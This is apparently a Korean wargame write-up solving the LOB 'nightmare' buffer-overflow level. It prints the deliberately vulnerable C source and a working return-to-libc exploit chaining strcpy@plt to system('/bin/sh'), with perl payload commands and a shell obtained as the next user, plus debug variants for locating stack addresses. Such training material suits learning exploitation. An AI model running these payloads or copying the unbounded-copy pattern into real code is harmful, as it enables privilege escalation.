
상대적으로 금방 풀었네요 

[succubus@localhost succubus]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>


// Entry point of the LOB "nightmare" challenge binary. Declared K&R-style with no
// return type (implicit int, pre-C99) and it never executes a return statement.
// argv[1] is untrusted input; the copy below is intentionally unbounded (this is
// the exercise), which is exactly what a reviewer would reject in real code.
main(int argc, char *argv[])

{

char buffer[40];   // 40-byte stack buffer; nothing below limits how much is copied into it

char *addr;        // address of the strcpy symbol, compared against bytes 44..47 of argv[1]


if(argc < 2){      // argv[1] is mandatory; leave with exit status 0 otherwise

printf("argv error\n");

exit(0);

}


// check address

addr = (char *)&strcpy;   // address of the strcpy symbol as seen from this binary

        // Compares 4 bytes at argv[1]+44 without ever checking strlen(argv[1]):
        // an argument shorter than 48 bytes makes memcmp read past the end of the string.
        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }


        // overflow!
        // Unbounded copy of untrusted argv[1] into the 40-byte buffer. No length check
        // exists anywhere above, so bytes past 40 overwrite adjacent stack memory
        // (a bounded copy or an explicit strlen() check would prevent this).
        strcpy(buffer, argv[1]);

printf("%s\n", buffer);   // relies on the terminator strcpy copied from argv[1]


// dangerous waterfall
// Writes 4 bytes at offset 48, i.e. 8 bytes past the end of the 40-byte array:
// an out-of-bounds write (undefined behaviour) into whatever the compiler placed there.
memset(buffer+40+8, 'A', 4);

}

소스에서 ret에 strcpy@plt를 넣는 것으로 봐서 rtl로 접근해야겠다고 생각했습니다 

[payload]

argv[1] 

buf40 |SFP | &strcpy@plt | dummy | dest(buf48) |source(argv[2])


argv[2] 

&system | &exit |&/bin/sh 

+) &system, &exit, &/bin/sh, &strcpy@plt 구하는 건 누구나 다 할 수 있으므로 생략


[attack]

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "a"x44,"\x10\x84\x04\x08","AAAA","\xa0\xfa\xff\xbf","\x32\xfc\xff\xbf"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?AAAA????

bash$ my-pass

euid = 518

beg for me




&buffer+48이랑 &argv[2]를 구하는 데 소스를 추가해서 구했는데, 한 가지 의문이 남는 부분이 있습니다 

---------------------------------------------------------------------------------------------------

ex1)

[succubus@localhost /tmp]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>


// Debug copy of the "nightmare" challenge main(): identical to the original except
// for the two printf() calls at the end that show where buffer and argv[2] live.
// Declared with no return type (implicit int, pre-C99) and never returns a value.
main(int argc, char *argv[])

{

   char buffer[40];   // 40-byte stack buffer; nothing below limits how much is copied into it

   char *addr;        // address of the strcpy symbol, compared against bytes 44..47 of argv[1]


   if(argc < 2){      // argv[1] is mandatory; leave with exit status 0 otherwise

      printf("argv error\n");

      exit(0);

   }


   // check address

   addr = (char *)&strcpy;   // address of the strcpy symbol as seen from this binary

        // Compares 4 bytes at argv[1]+44 without ever checking strlen(argv[1]):
        // an argument shorter than 48 bytes makes memcmp read past the end of the string.
        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }


        // overflow!
        // Unbounded copy of untrusted argv[1] into the 40-byte buffer; bytes past 40
        // overwrite adjacent stack memory, which is why the argv[2] printf below can
        // fault once the copy has run (see the page's ex1/ex2 comparison).
        strcpy(buffer, argv[1]);

   printf("%s\n", buffer);   // relies on the terminator strcpy copied from argv[1]


   // dangerous waterfall
   // Writes 4 bytes at offset 48, 8 bytes past the end of the 40-byte array:
   // an out-of-bounds write (undefined behaviour).
   memset(buffer+40+8, 'A', 4);

   // Debug output added for the write-up. Note: %x expects unsigned int but receives
   // a pointer — a format/argument mismatch (undefined behaviour); %p is the matching
   // specifier. Evaluated after the overflow, so argv itself may already be corrupted.
   printf("buffer Using : %x\n",buffer);

   printf("argv[2] Using : %x\n",argv[2]);

}

[succubus@localhost /tmp]$ ./nightmare `perl -e 'print "\x90"x44,"\x10\x84\x04\x08","aaaa","bbbb","cccc"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`

?????????????????????????????????????????????aaaabbbbcccc

buffer Using : bffffa70

Segmentation fault (core dumped)

~> argv[2]가 씹힘
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
ex2)
[succubus@localhost /tmp]$ cat nightmare.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

// Second debug copy of the "nightmare" challenge main(): prints argv[2] once *before*
// the overflow (and again after it) to show which of the two prints survives.
// Declared with no return type (implicit int, pre-C99) and never returns a value.
main(int argc, char *argv[])
{
   char buffer[40];   // 40-byte stack buffer; nothing below limits how much is copied into it
   char *addr;        // address of the strcpy symbol, compared against bytes 44..47 of argv[1]

   if(argc < 2){      // argv[1] is mandatory; leave with exit status 0 otherwise
      printf("argv error\n");
      exit(0);
   }
   // Printed before the overflow, so argv is still intact here. %x with a pointer
   // argument is a format/argument mismatch (undefined behaviour); %p is the matching specifier.
   printf("argv[2] Using:%x\n",argv[2]);// tried adding it here
   // check address
   addr = (char *)&strcpy;   // address of the strcpy symbol as seen from this binary
        // Compares 4 bytes at argv[1]+44 without ever checking strlen(argv[1]):
        // an argument shorter than 48 bytes makes memcmp read past the end of the string.
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }

        // overflow!
        // Unbounded copy of untrusted argv[1] into the 40-byte buffer; bytes past 40
        // overwrite adjacent stack memory (no length check exists anywhere above).
        strcpy(buffer, argv[1]);
   printf("%s\n", buffer);   // relies on the terminator strcpy copied from argv[1]

   // dangerous waterfall
   // Writes 4 bytes at offset 48, 8 bytes past the end of the 40-byte array:
   // an out-of-bounds write (undefined behaviour).
   memset(buffer+40+8, 'A', 4);
   // Debug output evaluated after the overflow; argv may already be corrupted by then.
   printf("buffer Using:%x\n",buffer);
   printf("argv[2] Using:%x\n",argv[2]);
}

[succubus@localhost /tmp]$ ./nightmare `perl -e 'print "\x90"x44,"\x10\x84\x04\x08","aaaa","bbbb","cccc"'` `perl -e 'print "\x90"x12'`
argv[2] Using:bffffc32
?????????????????????????????????????????????aaaabbbbcccc
buffer Using:bffffa70
Segmentation fault (core dumped)
~> 나옴 
---------------------------------------------------------------------------------------------------
+) strcpy 부분 때문에 argv[]를 뽑아오면서 영향을 주기 때문에, 소스 뒷부분에 argv[2] 주소를 뽑아주는 소스를 추가해주면 씹히게 됨 


